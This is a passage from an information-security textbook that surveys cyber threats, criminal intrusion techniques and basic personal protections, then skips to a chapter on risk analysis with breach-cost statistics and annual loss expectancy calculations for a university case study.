The surveillance state is aided by the surveillance industry. Standard industry practices of selling customer information have in some cases become illegal, as privacy regulation requirements have been instituted in many nations and states. In 2022, Instagram's violation of children's privacy, which included publishing children's email addresses and phone numbers, resulted in a European Union GDPR fine totaling €405 million [38].

1.2.3 Information Warfare

Governments fear that the next wars will involve computer attacks on infrastructure, such as power, water, financial systems, military systems, etc., as part of Information Warfare. A goal would be to disrupt society, and certainly the loss of electricity, gas and water would do so [35]. Cyberweapons are extremely cheap compared to the military variety, and can cause as much or more damage with less military personnel exposure and with more anonymity (and thus deniability). Thus, protecting utilities and other critical infrastructure is a crucial priority.

The first publicized use of cyberweapons was the 2010 Stuxnet worm, reputedly developed by the U.S. and Israel. Stuxnet took out nearly 1000 Iranian centrifuges, or nearly one fifth of those in service within Iranian nuclear facilities [22]. Iran replied by attacking American banks and foreign oil companies [21]. Stuxnet was only the first attack on critical infrastructure. Russia attacked Ukraine's electric utility two cold Decembers in a row, 2015 and 2016, taking the entire grid down the second year and leaving many homes without heat [29]. An earlier Russian method of cyber-warfare is DDOS, which was used against Estonian government, financial institutions and newspapers in 2007, and Georgian government websites and Internet infrastructure in 2008 [23].

Some ransomware is really meant to destroy, or to serve as a decoy for espionage operations: the criminals will happily receive your ransom payment, with no intent to recover your data. With Petya/NotPetya, ransomers inflicted damage while demanding payment. The Phonywall version served as a decoy: perpetrators stole information, then wrote over disks to hide their tracks [30].


Crackers can threaten anything computerized, including personal cars and homes. Security researchers have shown that car brakes and steering can be remotely controlled [24]. Seven hundred home security cameras were hacked, and people's private lives were put on display on webpages [25]. If a company does not take security very seriously and protect its software products, it can find its products hacked and its problems publicized in the news. In the U.S., the organization can then expect a very expensive visit from the Federal Trade Commission (FTC). The FTC may specify a 20-year security compliance audit program (as it did for TRENDnet [25]) and may levy megafines when laws are violated. You will read more about this in the chapters on regulation.

Hacktivism involves non-government groups attacking to achieve specific political causes (e.g., Mexican miner rights, WikiLeaks support) in illegal ways (e.g., DDOS attacks, defacing or taking down websites). Anonymous is an example of a loosely organized hacktivist group; its Operation Payback involved a massive DDOS attack on Visa, MasterCard, the Motion Picture Association of America, and the Recording Industry Association of America for 5 months starting September 2010 [13]. The credit card companies were attacked after they suspended payments to WikiLeaks. In addition, some Anonymous members have been arrested for common credit card theft [14]. Hacktivism is a small portion of criminal cases, summing to about 1% of all forensically analyzed attacks [36].

If an organization has vital proprietary information or trade secrets, accepts credit cards, manages money, owns computers, creates products with software in them, and/or plays a vital role in a community, security is an issue. Criminals know small businesses are easier to break into. Small businesses make an attractive target because they tend to lack strong security [2], and attacks can and have put small companies out of business.

Table 1.1 classifies example exploits across the history of cybersecurity. Unfortunately, older threat types do not disappear as new threats emerge. Hopefully this chapter has been informative and made you think of potential threats to your organization. The Security Workbook, available with this book, enables you to document these threats as part of the Workbook's Chap. 2. Writing them there will help with future chapters. Questions to consider include:
(a) Select the threats which are a concern in your industry: experimentation/vandalism, hacktivism, cybercrime, information warfare, intellectual property theft, surveillance state. List your threats in priority order and describe a scenario and the potential damage for each threat.
(b) List the exploits (or attacks) that are most serious and likely to occur in your workplace. For each exploit, describe what the impact might be for your workplace.


Table 1.1 History and categories of internet crime

Experimentation. 1984: Fred Cohen publishes "Computer Viruses: Theory and Experiments" [26].
Vandalism. 1988: The Jerusalem virus deletes all executable files on the system, on Friday the 13th [5]. 1991: The Michelangelo virus reformats hard drives on March 6, Michelangelo's birthday.
Hacktivism. 2010: Anonymous' Operation Payback hits credit card and communication companies with DDOS after payment card companies refuse to accept payment for WikiLeaks.
Cybercrime. 2008, 2009: Gonzalez re-arrested for sniffing WLANs and implanting spyware, affecting 171 million credit cards [27]. 2013: In July, 160 million credit card numbers are stolen via SQL injection attack; later in December, 70 million credit card numbers are stolen through Target stores [3]. 2016–2022: Uber pays $100,000 in ransom to criminals, but pretends instead to purchase bug information; for covering up the breach, Uber later pays $148 million to settle claims, and its chief security officer is tried and convicted [37].
Information warfare. 2007, 2008: Russia launches DDOS attacks against Estonian, then Georgian, news, government and banks [23]. 2016: Russia takes down Ukraine's entire electric grid on a December evening, two years in a row [29].
Surveillance state/espionage. 2012: State-affiliated actors, mainly tied to China, quietly attack U.S. and foreign businesses to steal intellectual property secrets, summing to 19% of all forensically analyzed breaches [39]. 2013: Lavabit closes its secure email service rather than divulge its corporate private key to the NSA without customers' knowledge. 2021: The SolarWinds supply chain attack installs malware into 18,000 organizations through unknowingly infected third-party software [34]. 2022: Instagram is fined €405 million under GDPR for publishing children's emails and phone numbers [38].

1.3 Criminal Techniques to Enter, Investigate, and Persist in a Network

Between obtaining their first foothold in a network and achieving their final goal, criminals take a series of steps to search the network, expand their capabilities and hide their tracks. This section outlines some of the steps and techniques they use to enter and peruse a network.

The first step a sophisticated attacker usually takes is to learn a lot about the organization and its network. They want to understand who works there (names, titles, rank) and the lingo used, so that they may deploy phishing and spear phishing successfully. They want to learn the deployed software, to launch effective attacks against potential vulnerabilities. They may want to learn the organization's financial


situation, e.g., to set a high but financially reasonable ransom price. They learn all this through web and news searches and by investigating garbage (often through literal dumpster diving).

Verizon's 2022 Data Breach Investigations Report indicates that common initial ways to enter a targeted network and implant malicious software (or malware) include web application attacks, email, carelessness (or errors) and desktop sharing software (i.e., logging into machines remotely) [2]. Web attacks often use vulnerabilities, i.e., software or configuration defects, that enable attackers to gain entry. Patching all software in a timely manner (network, operating system, and applications) is important to closing such vulnerabilities.

Criminals or crackers often launch attacks using email and web scams. Phishing is an email scam, where the email serves as a hook and people in your organization are the intended fish! An email from 'your' bank can request immediate action, or ask you to help in transferring money from a foreign country. The email can be well-written to fool even the most suspicious, or poorly written to attract only the most gullible. Spear phishing is when a particular person is targeted with a special scam email, using knowledge of their interests, friends, and lifestyle. Pharming is a web scam, where a scam webpage resembles a real webpage. A phishing email often includes a link to a pharmed webpage. Clicking on that link causes infection; or by logging in, you may unknowingly give the attackers account information or access. However, it is not only pharming sites that are infected with malware. Google has reported that it flags some 10,000 sites daily for infections and warns webmasters and users during Google searches [6]. The risk is that eventually someone in your department is likely to take the bait by opening an email attachment, following a link to an infected web site, or inserting an infected memory stick into a computer.

One specific type of email attachment or web download could be a Trojan horse. Similar to the Greek story of the Trojan War, when the Achaean army hid inside a large wooden horse given as a gift to the city of Troy, a computer Trojan horse is a real program that is advertised to do one thing (e.g., display a video clip), while it secretly also does something malicious. For example, the Zeus Trojan turned millions of computers into Zeus bots [5], often via Facebook [6]. Zeus stays dormant on a compromised computer until the victim logs into a bank site. Then it steals the victim's passwords, which are used to empty the victim's accounts [6]. It can also impersonate a bank's website in order to collect private information, such as social security numbers and/or bank account numbers, to sell on the dark web.

Once attackers have entered a network, they often want to expand their capabilities by learning password credentials. One option is to install a keystroke logger, which records the keys entered. As you enter a password or credit card information, these keystrokes are secretly sent over an internet connection to the criminal. Soon you could see unusual emails coming from your account, strange charges on your credit card statement, or learn that an account has been opened in your name. In bulk, credit card numbers have been sold for as little as $1 apiece [4]. Prices are low due to successful criminal rings, such as Gonzalez's, which cracked and exposed over 170 million credit card numbers [42].


In addition, intruders may want to hide their actions while waiting to steal information, such as passwords, credit card numbers, or confidential or proprietary organizational information. The malware may install a backdoor, a program that enables the attacker to gain entry to a computer without a password. A rootkit, when installed, hides all tracks of the attacker, including modifying computer logs and causing the operating system utilities to not display the programs that the attacker executes. Many proprietary secrets have recently appeared within Chinese companies, which then compete with the original companies for their business, without the expense of product development.

If the attacker wants to disrupt operations for extortion, information warfare or grudge reasons, a means to disrupt service or damage equipment is a Denial of Service (DoS) attack, where the attacker may cause a server to lock up periodically, clear the server's hard drive (e.g., Shamoon), or run a program that heavily uses system resources, making the server sluggish.

Alternatively, criminals may want to infiltrate computers to store exploit or spam software, or to host illegal movies or pornography. Why should they buy computers when they can infiltrate computers for free? The malware may turn a computer into a zombie or bot (short for robot). First, they may insert a backdoor to freely access the computer, then install a rootkit to hide their tracks, and finally insert control software into the computer. The control program enables them to house hidden files (e.g., illegal movies or pornography) on the computer, or to launch attacks against other computers. A criminal organization may create an army of these bots, called a botnet. Time on a botnet has been sold for prices as low as $100 per 1000 infected computers [43]. Remember the law of supply and demand? If supply is high, the price becomes low.

The kinds of exploits that botnets may perform include massive spamming, Distributed Denial of Service attacks, password cracking, and hiding other illegal attacks. In each of these exploits, hundreds or thousands of computers (or bots) are commanded to attack. Spammers may generate the massive impersonal emails we receive daily. Password cracking programs automatically guess passwords until a successful login occurs. Alternatively, a file containing password hashes can be copied from an infiltrated computer, and a large set of bots can analyze the passwords at their leisure. This can happen without the computers' owners knowing.

Botnets need to expand to an army of infiltrated host computers, and worms and viruses are one automated mechanism that can grow such networks through their propagation stage. A worm may look at an email contact list and automatically email itself to these contacts, or try in other ways to connect to neighboring computers within a network. A virus will attach itself to a useful program and will execute with that program, possibly installing itself as a startup program to ensure it is automatically executed when the computer powers up. Both worms and viruses have a propagation stage; a triggering stage, which sets the time for the next stage; and an execution stage, which executes whatever the malware was designed for. The difference between a virus and a worm is that a worm is a standalone program, whereas a virus attaches itself to other programs.


Malware may also be used for other purposes. Spyware, useful in espionage and the surveillance state, includes keystroke loggers, but also software that monitors the owner's location or website accesses to sell those interests to data warehouses or authoritarian governments. Spyware can also use an infiltrated computer's camera and/or microphone to record the owner's actions. It has been estimated that spyware/keyloggers were included in 75% of all malware [39]. Other malware might be used for financial gain or control. Adware may show pop-ups of specific ads, or prevent owners from accessing specific web sites, including preferred search engines. A logic bomb is a program where the author has inserted code to potentially do something malicious at a triggered time. An example might be a software program that fails if the company does not pay a maintenance fee, or if a programmer is fired.

Why doesn't law enforcement stop cybercrime and espionage? It is very difficult. The Internet crosses borders without passport control, and jurisdiction is an issue. During the last century, if someone wanted to rob a bank, they would physically have to go to the bank with a gun. Today, unsophisticated computer crackers can rob a bank in your nation from a living room on another continent. They can purchase or rent a malware toolkit containing a keystroke logger to steal password credentials [7]. In addition, a criminal may live in Russia, 'own' a botnet control computer in Yugoslavia, and 'own' bots all over the world. Thus, if a government tracks an exploit to a bot, it will likely need to involve multiple governments and agencies in tracking the attack back to the original criminal. Many governments have higher-priority problems than Internet crime occurring in other countries. In fact, criminal organizations may appear to be normally operating businesses. Intelligent criminals can and do hide their tracks internationally. As a measure of defense, the FBI now stations cybersecurity experts at embassies in various parts of the world to negotiate with local law enforcement [18].

These are the common types of exploits that every computer user should be aware of. If law enforcement cannot protect much, then you must protect yourself and your organization. The next section discusses what every user should do to protect themselves. More advanced security measures are discussed in later sections of this text.

1.4 Protecting Yourself

The best way to protect yourself is to never be vulnerable: never connect to the Internet or any other network, turn off your wireless network connection, and never load files from external sources. Do all this, and your computer is still vulnerable to physical access. If you are not willing to live the life of an Internet hermit, then you have chosen to take non-negligible risks. You can only minimize risks, not eliminate them.


It is most important to set up a computer properly to combat malware. Procure antivirus software and ensure that security options, including a firewall, are turned on. Antivirus software matches signatures (or snippets) from viruses and worms against the files in a computer. A good antivirus package will also observe software as it executes, to determine if a downloaded file has a virus or if the firewall is turned off. Some antivirus software also monitors transmissions and the specific port numbers (or application IDs) you are sending to and receiving from. Examples of ports include web HTTP, email SMTP, and Secure File Transfer Protocol (SFTP). This port use information is aggregated over thousands of computers. When a new pattern of usage emerges, such as computers suddenly using an unusual port number, the emerging application is observed for malware activity. Antivirus software is an important investment for all computers (laptop, smart phone, tablet) because malware is likely wherever you read email, open webpages, and download applications.

A second step in combatting malware is to ensure that the operating system, applications, and antivirus software are updated regularly. Modern-day programs are large and complex, and often have bugs (or defects). Crackers and criminals often take advantage of these bugs, issuing attacks specifically against them. These bugs are periodically found and fixed by the manufacturer, by patching the software. One example of such a software bug (and proof that all operating systems are targeted) was the Mac Fakeflash virus. This virus infected half a million Macs by downloading itself through a hole in Java software, without any user action or notification. Apple promptly published a fix. Users who downloaded patches immediately were the safest against this (and other) threats [8].

A third step in setting up a system against malware is to ensure the firewall is enabled and properly configured. Firewalls vary in capability, but a firewall for a personal computer generally ensures that the computer filters incoming transmissions by application type. For example, firewalls generally allow outgoing transmissions from a computer, and replies to those transmissions using the same port. Your firewall should discard strange incoming requests on unused ports. A personal computer firewall (by itself) will not filter malware transmissions within allowed incoming packets.

A fourth must-do is to use excellent passwords with two-factor authentication. Verizon's 2022 Data Breach Investigations Report reveals that passwords and other credentials are the most commonly compromised data, at 63% [2]. Once a login is possible, an attacker can do all sorts of harm, including organizational espionage, installing ransomware, or sending email in your name (known as business email compromise). Any cracker knows that your login name is probably your email name, and can use automated password-guessing software to guess passwords. A dictionary attack uses software that iterates through a password dictionary of common names and words to guess someone's password on the system. A social engineer will try your favorite people, pets, teams, hobbies and more as potential passwords. If neither of these short-cut methods works, then the cracker may try a brute force attack. With this exploit, all possible combinations of passwords,


starting with a, aa, ab, ac, and so on, will be attempted until success is reached. If we assume the attacker has access to a botnet, then the job of guessing passwords is divided among many computers. If a password is 8 characters long and uses the alphabet, numbers, and punctuation, it may take 2 hours or less to break into that account. Longer passwords are better. If a password is 12 alphabetical characters long, it can take up to 96 years to crack, or as long as 500 years if you also include numbers. Thus, it is important to use long passwords and to avoid any common words or names in a password. Two-factor authentication combines something you know (e.g., a password) with something you are (e.g., your fingerprint) or something you have (e.g., a cell phone). To learn how to create a secure password, see Fig. 1.1 and Table 1.2. Finally, never divulge your password or write it down.

These four steps (using current antivirus software, having a great password and, better yet, two-factor authentication, ensuring software updates occur, and using a firewall) are important setup steps for all computers, including smart phones. However, your behavior on your computer is just as important. It takes time for antivirus, operating system, and software companies to recognize and defend against the new exploits that emerge daily. Even with these precautions, you may download zero-day attacks, which are attacks for software bugs or worms that are not yet known and have no defenses. Therefore, be careful to access or download only from trusted sources.
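The arithmetic behind such cracking-time estimates can be sketched in a few lines of Python. The guess rate below is an assumed figure (real rates vary enormously with the password-hashing scheme, the attacker's hardware, and whether the attack is online or offline), so the printed numbers are illustrative only; the point is how sharply the keyspace grows with password length and character-set size.

```python
# Minimal sketch (guess rate is an assumption): worst-case brute-force
# time is keyspace size divided by an assumed guessing rate.
import string

def worst_case_years(length: int, charset_size: int,
                     guesses_per_sec: float) -> float:
    """Years to enumerate every password of the given length."""
    keyspace = charset_size ** length
    return keyspace / guesses_per_sec / (365 * 24 * 3600)

FULL = len(string.ascii_letters + string.digits + string.punctuation)  # 94
ALPHA = len(string.ascii_lowercase)                                    # 26
RATE = 1e10  # assumed guesses/second for a well-resourced attacker

print(f"{worst_case_years(8, FULL, RATE):.2f} years")    # 8 chars, full set
print(f"{worst_case_years(12, ALPHA, RATE):.2f} years")  # 12 lowercase chars
print(f"{worst_case_years(16, FULL, RATE):.2e} years")   # 16 chars, full set
```

Plugging in a slower assumed rate reproduces figures closer to the ones quoted above; either way, each added character multiplies the attacker's work by the size of the character set.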

Fig. 1.1 Creating a good password from a bad one: starting from a memorable phrase (e.g., 'Merry Christmas'), techniques include substituting a synonym ('Merry Xmas'), intertwining letters, converting vowels to numerics, lengthening ('MerryChrisToYou'), combining languages ('MerryJul'), abbreviating ('MerChr2You', 'MaryJul'), and keypad-shifting

Table 4.1 (fragment) Threats to security attributes at Einstein University: Availability => loss of registrations; Integrity => student lawsuit; Confidentiality => possible FERPA violation => forensic help; both => forensic help

Table 4.2 Consequential financial loss calculations (workbook exercise)

Consequential Financial Loss | Total Loss | Calculations or Notes
Lost business for one day (1D) | 1D = $16,000 | Registration = $0–500,000 per day in income (avg. $16,000)
Breach cost | $644,000 | IBM breach cost estimate using per-record cost: $161* × 4000 students = $644,000; OR maximum estimate for the education industry: $3.79 million*. This comprehensive number includes forensic help (* from [IBM21])
Lawsuit | $1 million | A student lawsuit may result as a liability
FERPA regulation | $1 million | Violation of FERPA regulation can lead to loss of government aid; assumes negligence

reader of this book is or has been a student; do you agree you are (or were) only worth this measly amount? A later section in this chapter will address the ethics of risk, including this issue. Until then, further analysis of this case will focus only on the information security aspect, which is the topic of this book.

Table 4.1's Consequential Financial Loss (column 3) is the most complex column to complete. Table 4.2 helps in understanding it, by providing notes and


special calculations for any complex consequential financial losses. Both tables are provided in the Security Workbook for you to calculate. IBM Security's Cost of a Data Breach Report provides an inclusive estimate of a data breach that considers forensic costs, lost business, etc. One problem in using the report is that breach costs can be calculated using a per-breached-record value, or by using the average total breach cost; here these vary between $644,000 and $3.79 million. I continue with the $644,000 number, but management should be aware that the cost could total $3.79 million or more.

Annual security studies provide statistics estimating average security incident costs. Table 4.3 shows an average cost for organizations, as provided by IBM Security's Cost of a Data Breach Report (in conjunction with Ponemon Institute) in 2021–2022 [2, 3]. These numbers vary from year to year, but the top four initial attack vectors are common to 2021 and 2022. A single-calculation estimate of an organization's security liability is the product of the average cost per breached record and the number of records of personally identifiable information (PII) the organization processes. Average per-record breach costs recently ranged from a low of $146 (2020) to a high of $164 (2022) [3]. (Our Einstein case study uses the 2021 statistic of $161 per breached record.) Table 4.4 shows the average cost of a data breach for a number of industries, as provided by IBM Security's Cost of a Data Breach Report for 2021. Table 4.5 shows the average cost of a data breach by nation, where ASEAN represents the Association of South-East Asian Nations. While not provided in these Verizon and IBM reports, the average breach frequency quoted by past reports is approximately 12% annually [4].

Risk Analysis consists of the next three steps: analyzing threats and vulnerabilities, estimating the likelihood of exploitation, and computing expected losses.

Table 4.3 Average cost of a data breach: IBM Security's Cost of a Data Breach Report 2021, 2022 [2, 3]

Category | Avg. cost per breach (in millions)
Most common initial attack vectors:
Stolen or compromised credentials (19%) [3] | $4.50
Phishing (16%) | $4.91
Cloud misconfiguration (15%) | $4.14
Third-party software vulnerability (13%) | $4.55
Average breach cost | $4.35
Mega breach cost [2]:
1–10 million records breached | $52
50–65 million records breached | $401
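The single-calculation liability estimate described above is easy to automate. A minimal sketch using the case study's numbers follows; the 12% annual breach frequency is the rough figure quoted from past reports [4], not an IBM or Verizon statistic.

```python
# Minimal sketch: average per-record breach cost times the number of
# PII records the organization processes.
def breach_liability(pii_records: int, per_record_cost: float) -> float:
    return pii_records * per_record_cost

# Einstein University case study: 4000 student records at the 2021
# average of $161 per breached record.
loss = breach_liability(4000, 161)
print(f"Estimated breach loss: ${loss:,.0f}")  # $644,000

# Expected annual cost, applying the ~12% annual breach frequency
# quoted from past reports (an approximation).
print(f"Expected annual loss:  ${loss * 0.12:,.0f}")  # $77,280
```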

Table 4.4 Breach cost by industry: IBM Security's Cost of a Data Breach Report 2021 [2]

Industry | Cost of breach (in millions)
Communications | $3.62
Consumer | $3.70
Education | $3.79
Energy | $4.65
Financial | $5.72
Health care | $9.23
Hospitality | $3.03
Industrial | $4.24
Media | $3.17
Pharmaceutical | $5.04
Public sector | $1.93
Research | $3.60
Retail | $3.27
Services | $4.65
Technology | $4.88
Transportation | $3.75

Table 4.5 Regional risks

North America. Top attack types (Verizon 2022) [5]: System intrusion, Social engineering, Web app attacks. Motive (Verizon 2022) [5]: Financial 96%, Espionage 3%, Grudge 1%. Average cost of breach, in millions (IBM 2022) [3]: United States $9.44; Canada $5.64.

Europe-Africa. Top attack types: Social engineering, System intrusion, Web app attacks. Motive: Financial 79%, Espionage 21%. Average cost of breach: Middle East $7.46; Western European Union nations $3.74–$4.85; United Kingdom $5.75; Scandinavia $2.08.

Asia Pacific. Top attack types: Social engineering, Web app attacks, System intrusion. Motive: Financial 54%, Espionage 46%. Average cost of breach: Japan $4.57; ASEAN-Australia $2.87–$2.92; India $2.32.

Latin & South America. Top attack types: System intrusion, Denial of service, Social engineering. Motive: Financial 92%, Convenience 3%, Espionage 2%, Grudge 2%. Average cost of breach: Latin America $2.80; Brazil $1.38.

Sources: IBM Security's Cost of a Data Breach Report 2022 [3]; Verizon Data Breach Investigations Report 2022 [5]


4.1.2 Step 2: Determine Loss Due to Threats

In this step we consider all the probable threats that are likely to occur. These will vary based upon your industry, geographic location, culture and company. Figure 4.3 helps to explain security vocabulary. A diamond cutter will have diamonds, which are her assets. A threat to this industry is theft, but a 'threat' is only a concept; the word does not imply that the problematic event has actually occurred. An example of a vulnerability might be an unguarded, open door, which provides the opportunity for the threat to occur. The threat agent in this example is the thief. Risk is the potential danger to assets. Consider a wide variety of possible threats, threat agents and vulnerabilities. Problems can arise due to any of the following threats [6, 7]:

Physical Threats
• Natural: Flood, fire, cyclones, hail/snow, plagues and earthquakes
• Unintentional: Fire, water, building damage/collapse, loss of utility services and equipment failure
• Intentional: Fire, water, theft and vandalism

Fig. 4.3  Threats, vulnerabilities, and threat agents


Non-physical Threats
• Ethical/Criminal: Fraud, espionage, hacking, identity theft, malicious code, social engineering, vandalism, phishing and denial of service
• External Environmental: Industry competition, or changes in the market, political, regulatory or technology environment
• Internal: Management error, IT complexity, poor risk evaluation, organizational immaturity, accidental data loss, mistakes, software defects and personnel incompetence

For the ethical/criminal category (the focus of this chapter), possible threat agents include people who perform intentional threats, such as crackers, criminals, industry spies, insiders (e.g., fraudsters), and terrorists/hacktivists. Vulnerabilities are the 'open doors' that enable threats to occur. Categories of vulnerabilities include:
• Behavioral: Disgruntled employees, poor security design, improperly configured equipment
• Misinterpretation: Employee error or incompetence, poor procedural documentation, poor compliance adherence, insufficient staff
• Poor coding: Incomplete requirements, software defects, inadequate security design
• Physical vulnerabilities: Theft, negligence, extreme weather, no redundancy, violent attack

4.1.3 Step 3: Estimate Likelihood of Exploitation

For each important threat, consider the likelihood (or probability) that the event will occur. Selecting good statistics is a challenge; they may come from past experience (yours or others'), your best analysis, or (worst case) your best guess. Your own experience is a personalized statistic that can be calculated from your metrics and reports. Others' experience may include professional risk assessors (often associated with the insurance industry) and national or international standards or reports, such as those shown in Tables 4.4 and 4.5. You may be able to derive reasonable statistics from economic, engineering, or market analysis models, or from experiments. A last resort (but certainly better than no statistic) is your best guess. It is also important to consider trends: is a threat increasing or decreasing in likelihood?

Table 4.6 lists recent security concerns per industry, provided by Verizon's Data Breach Investigations Report [5]. These statistics were accumulated from law enforcement, forensic groups, cyber emergency response teams, and service providers worldwide. They evaluate the total set of analyzed data breach attacks, and proportion them out by industry. Statistics include the source of the attacks (external versus internal employees), the motive of the attack, and the types of breached records. The top attack types combined generally total 80–90% of attacks; one is System intrusion, which includes advanced persistent threats and ransomware. These statistics can help determine the priority and types of problems your industry is prone to. They cannot be directly used in risk analysis, since they do not indicate the rate of attack.


Table 4.6 Security attacks by industry: Verizon Data Breach Investigations Report 2022 [5]

Accommodation, food services. Attack source: External 90%, Internal 10%. Motive: Financial 91%, Espionage 9%. Top attack types: System intrusion, Social engineering, Web app attacks. Compromised data: Credentials 45%, Personal 45%, Payment 41%, Other 18%.

Education. Attack source: External 75%, Internal 25%. Motive: Financial 95%, Espionage 5%. Top attack types: System intrusion, Web app attacks, Errors. Compromised data: Personal 63%, Credentials 41%, Other 23%, Internal 10%.

Entertainment, recreation. Attack source: External 74%, Internal 26%. Motive: Financial 97%, Grudge 3%. Top attack types: Web app attacks, System intrusion, Errors. Compromised data: Personal 66%, Credentials 49%, Other 23%, Medical 15%.

Finance, insurance. Attack source: External 73%, Internal 27%. Motive: Financial 95%, Espionage 5%. Top attack types: Web app attacks, System intrusion, Errors. Compromised data: Personal 71%, Credentials 40%, Other 27%, Bank 22%.

Healthcare. Attack source: External 61%, Internal 39%. Motive: Financial 95%, Espionage 4%, Convenience 1%, Grudge 1%. Top attack types: Web app attacks, Errors, System intrusion. Compromised data: Personal 58%, Medical 46%, Credentials 29%, Other 29%.

Information. Attack source: External 76%, Internal 24%. Motive: Financial 78%, Espionage 20%, Ideology 1%, Grudge 1%. Top attack types: System intrusion, Web app attacks, Errors. Compromised data: Personal 66%, Other 35%, Credentials 27%, Internal 17%.

Manufacturing. Attack source: External 88%, Internal 12%, Partner 1%. Motive: Financial 88%, Espionage 11%, Grudge 1%, Secondary 1%. Top attack types: System intrusion, Web app attacks, Social engineering. Compromised data: Personal 58%, Credentials 40%, Other 36%, Internal 14%.

Mining, utilities. Attack source: External 96%, Internal 4%. Motive: Financial 78%, Espionage 22%. Top attack types: Social engineering, System intrusion, Web app attacks. Compromised data: Credentials 73%, Personal 22%, Internal 9%.

Professional services. Attack source: External 84%, Internal 17%, Multiple 1%. Motive: Financial 90%, Espionage 10%. Top attack types: System intrusion, Web app attacks, Social engineering. Compromised data: Credentials 56%, Personal 48%, Other 26%, Internal 14%.

Public admin. Attack source: External 78%, Internal 22%. Motive: Financial 80%, Espionage 18%, Ideology 1%, Grudge 1%. Top attack types: System intrusion, Errors, Web app attacks. Compromised data: Personal 46%, Credentials 34%, Other 28%, Internal 28%.

Retail. Attack source: External 87%, Internal 13%. Motive: Financial 98%, Espionage 2%. Top attack types: System intrusion, Social engineering, Web app attacks. Compromised data: Credentials 45%, Personal 27%, Other 25%, Payment 24%.

Very small business. Attack source: External 69%, Internal 34%, Multiple 3%. Motive: Financial 100%. Top attack types: System intrusion, Social engineering, Privilege misuse. Compromised data: Credentials 93%, Internal 4%, Bank 2%, Personal 2%.

Table 4.6 shows that for most organizations, organized crime is the biggest threat [5]. Protected assets include payment cards, financial credentials and bank account information. If an organization is primarily classified as information, mining, utilities, public administration or professional services, spying is also a considerable threat. Active state affiliates include China, North Korea, and eastern Europe. Desired assets include password credentials, trade secrets, technical resources (e.g., source code) and classified information [5]. The spies target mail servers, file servers, directory servers and laptops/desktops. Their favorite attacks include spear phishing, stealing data (passwords, information) and remote control of computers (backdoors, botnets and rootkits).

4.1.4 Step 4: Compute Expected Loss

After listing important assets and likely threats, and estimating the probability that these threats will occur, we can calculate our estimated annual loss due to risks. There are three common methods to do this: Qualitative, Quantitative and Semi-Quantitative Analysis. If you have never done risk analysis before, the Qualitative Analysis technique is the easiest, fastest and recommended place to start. It is also helpful when you do not know precise threat probabilities or asset costs, such as intangible costs: e.g., what is the cost of loss of reputation following a public announcement of data intrusion? Qualitative Analysis works with intuition and judgment rather than actual cost values. The end result is a list of priority risks to address.

Qualitative Analysis uses the Vulnerability Assessment Quadrant Map, shown in Fig. 4.4. The horizontal axis indicates the impact of the threat on your business, from 'Slow Down Business' at the far left to 'Threaten Business' at the far right. The vertical axis represents the probability of the event occurring, from once a week (or less) at the top to once in 50 years at the bottom. This results in four quadrants, with Quadrant 1 in red.

Fig. 4.4 Qualitative risk assessment (workbook exercise). A quadrant map plotting likelihood (vertical axis: from weekly down through 1, 5, 10, 20 and 50 years) against impact (horizontal axis: 'Slow Down Business', 'Temporarily Shut Down Business', 'Threaten Business'). Example placements include snow emergency and stolen laptop (likely, lower impact); hacker/criminal threat, malware, loss of electricity and social engineering (likely, higher impact); failed disk, intruder and stolen backup (less likely); and tornado/wind storm, earthquake, flood, pandemic and fire (rare but business-threatening)

When threats lie in Quadrant 1, they have both a high likelihood and a high impact, and thus are most serious. The yellow quadrants, Quadrants 2 and 3, have either a high likelihood or a high impact, but not both. Threats lying in these quadrants are lower priority than Quadrant 1 threats, but may still be important. Quadrant 4, in green, includes threats that have low probability and low impact, and thus can usually be ignored. The vertical time interval and horizontal business impact labels are not usually shown in Qualitative Analysis, but are provided here to help understand magnitude. Threats are shown in white boxes in Fig. 4.4. The position of the threats will vary by geographic location, industry type, etc. In the Security Workbook, you can alter this diagram by moving threats around to their appropriate quadrants, and locations within quadrants, for your organization.

While Qualitative Analysis is relatively easy, it provides neither an estimated cost of risk exposure, nor financial advice on how much to spend on security controls. Quantitative Risk Assessment helps with both goals. The first step is to estimate the Single Loss Expectancy (SLE), which is the cost to the organization if a threat occurs once [1]. This expense includes the direct replacement cost plus potentially additional expenses, such as installation. The Annual Rate of Occurrence (ARO) is the probability or likelihood that an SLE might occur during one year. The Annual Loss Expectancy (ALE) is the expected loss per year due to the threat, and is calculated as:

ALE = SLE × ARO (4.2)
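As a minimal sketch, formula (4.2) can be checked against the first row of Table 4.7 below (the function name and structure are illustrative choices):

```python
# Formula (4.2): Annual Loss Expectancy = Single Loss Expectancy x
# Annual Rate of Occurrence.
def ale(sle: float, aro: float) -> float:
    return sle * aro

# Table 4.7, row 1: registration server failure costs $10,000 plus
# $32,000 of lost registration over two days, expected every 5 years.
print(ale(10_000 + 32_000, 0.2))  # 8400.0 -> $8,400/year
```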


Table 4.7 Partial quantitative risk analysis for Einstein University (workbook exercise)

Asset | Threat | Single Loss Expectancy (SLE) | Annualized Rate of Occurrence (ARO) | Annual Loss Expectancy (ALE)
Registration Server | System or Disk Failure | System failure $10,000 + registration × 2 days $32,000 | 0.2 (5 years) | $8,400
Registration Server | Hacker penetration | Breach estimate $644,000 (max $3.7 million) + registration × 2 days $32,000 | 0.20 (5 years) | $676,000 × 0.2 = $135,200 (max: $3.7M × 0.2 = $740,000)
Grades Server | Hacker penetration | Breach estimate $644,000 | 0.05 (20 years) | $644,000 × 0.05 = $32,200
Faculty Laptop | Stolen | $1,000; also FERPA = $1 million and loss of reputation | 2 (5 years × 10 instructors); 0.01 for FERPA | $2,000; $10,000 for FERPA

Table 4.7 demonstrates a partial Quantitative Risk Analysis for Einstein University. Row four demonstrates the loss of faculty laptops, which have a higher loss rate than the commonly used faculty PCs. If the loss of a laptop costs $1000, including replacement and installation expense, and laptops are lost on average every five years, then the tangible cost is SLE = $1000, the ARO = 0.2, and the ALE = $1000 × 0.2 = $200 per year. If we have 10 instructors with laptops, then an accurate direct loss estimate uses ARO = 10 × 0.2 = 2, and the ALE would be calculated as ALE = $1000 × 2 = $2000 per year. Such losses could also expose grades and Social Security Numbers, leading to the probability of a FERPA investigation and bad press. This could result in additional consequential financial losses, estimated as an SLE of $1 million. This is calculated separately, with an estimated ARO = 0.01 (once in 100 years), leading to an ALE of $10,000.

For some threats, even a maximum reduction in value will not result in a total loss. For example, a fire may reduce the value of a building from $1 million to $200,000, which is the value of the land itself. In this case, the exposure factor is 80%. The appropriate SLE calculation would be:

SLE = Asset Value (AV) × Exposure Factor (EF) (4.3)
